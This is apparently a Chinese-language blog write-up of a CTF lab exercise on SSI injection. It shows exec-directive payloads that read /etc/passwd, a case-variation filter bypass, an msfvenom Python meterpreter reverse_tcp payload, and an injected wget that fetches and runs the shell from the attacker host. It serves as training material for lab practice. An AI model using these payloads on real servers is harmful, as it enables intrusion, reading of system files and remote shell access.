• CTF—攻防练习之HTTP—SQL注入(SSI注入)


    主机:192.168.32.152

    靶机:192.168.32.161

    ssI是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤
    该网站可能存在SSI注入漏洞

    ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。

    如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

    切换目录<!--#exec cmd="cd /root/dir/" -->

     nmap,nikto 分析,发现可能存在SSI注入,

    dirb 看看目录

    index目录下,有个SSi语句

     SSI目录下看到应该是和命令注入有关

    通过robots.txt目录挖掘到站点的根目录

    打开网页找一个注入点,测试后,在这里找到,发现有过滤,大小写可绕过,网页给出的测试命名少了个!符号,加上测试成功

     此时我们就可以尝试生成一个python shell 上传到网站服务器根目录上,再执行反弹监听

     msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
    在打开msfconsole监听

    此时再将生成的pyshell上传至web根目录(/var/www/html),再打开apache服务器

     

    在开启apache服务器,查看状态

    再将pyshell下载到站点上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->

    再提权

    <!--#exec cmd="chmod 777 pyshell.py" -->

     然后启动python pyshell.py,成功反弹shell!

    随后,进入shell,优化终端,可以进入root目录

  • 相关阅读:
    记一次 产品提的需求 (声音、振动)
    vue.config.js publicPath "./" npm run build无效的原因
    js 去掉字符串str中,连续重复的地方
    微信小程序map地图画圆圈效果
    2019年计划
    centos 7 nginx 远程无法访问的原因
    Eclipse配置关联Tomcat并运行项目
    .net连接mysql
    python xml.dom模块解析xml
    气象城市ID列表
  • 原文地址:https://www.cnblogs.com/zhaoyixiang/p/11052613.html
Copyright © 2020-2023  润新知